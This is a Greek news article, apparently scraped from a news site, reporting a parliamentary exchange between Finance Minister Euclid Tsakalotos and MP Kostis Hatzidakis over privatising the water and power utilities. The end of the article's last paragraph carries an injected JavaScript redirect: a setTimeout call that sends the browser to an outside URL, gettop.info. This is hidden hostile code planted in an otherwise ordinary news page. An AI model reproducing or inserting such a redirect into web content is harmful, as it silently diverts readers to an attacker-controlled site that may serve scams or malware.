Κόντρα Τσακαλώτου-Χατζηδάκη για ΕΥΔΑΠ και ΕΥΑΘ

0
12

Με την κόντρα του υπουργού Οικονομικών Ευκλείδη Τσακαλώτου με τον βουλευτή της ΝΔ Κωστή Χατζηδάκη κορυφώθηκε η συζήτηση για το πολυνομοσχέδιο στη Βουλή.

Την έντονη αντίδραση του κ. Τσακαλώτου, πυροδότησε ο χαρακτηρισμός από τον κ. Χατζηδάκη, ως «ανεπαρκών» των διαβεβαιώσεων του υπουργού Οικονομικών ότι όσο ο ίδιος είναι υπουργός δεν θα υπάρξουν αποκρατικοποιήσεις μέσω του υπερταμείου.

«Δεν θα είστε για πολύ ακόμα εσείς υπουργός και πρωθυπουργός ο κ. Τσίπρας. Τι νόημα έχει μια δημόσια δήλωσή σας αφού απ’ όσα λέτε κάνετε πάντα τα αντίθετα;», ανέφερε ο κ. Χατζηδάκης, ενώ αναφερόμενος στους βουλευτές του ΣΥΡΙΖΑ είπε ότι «είναι αληθινοί μαρξιστές υπό την έννοια όμως ότι υποστηρίζουν αυτό που είχε πει ο κωμικός Γκράουτσο Μαρξ: “Αυτές είναι οι απόψεις μου, αν δεν σας αρέσουν διαθέτω κι άλλες”», ενώ παραφράζοντας τον Νίκο Καζαντζάκη είπε: «Οι Έλληνες δεν ελπίζουν σε τίποτα. Ευτυχώς σε λίγο καιρό θα είμαστε ελεύθεροι».

Απαντώντας ο κ.Τσακαλώτος τον προκάλεσε να ξεκαθαρίσει τι θα κάνει η ΝΔ με την ΔΕΗ και την ΕΥΔΑΠ εάν γίνει κυβέρνηση.

«Από χθες σας λέω ότι δεν πρόκειται όσο είμαστε κυβέρνηση να υπάρξει ιδιωτικοποίηση σε ρεύμα και νερό κι εσείς επιμένετε στα δικά σας. Έχετε τα εντόσθια να γίνει διάλογος σε αυτή Βουλή; Και να μας πείτε η ΔΕΗ και η ΕΥΔΑΠ είναι ασφαλείς στα δικά σας τα χέρια; Πείτε μας ένα ναι ή ένα όχι. Τι θα κάνετε αν γίνετε κυβέρνηση; Θα ακολουθήσετε τη δική μας πολιτική ή θα ιδιωτικοποιήσετε ρεύμα και νερό;», τόνισε ο κ. Τσακαλώτος και κατέληξε λέγοντας: «Θέλω να ευχαριστήσω από καρδιάς τον κ. Χατζηδάκη γιατί δεν έχει απαντήσει, ούτε τι μέσα θα χρησιμοποιήσει η ΝΔ ούτε αν θα συνεχίσει τις ιδιωτικοποιήσεις». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here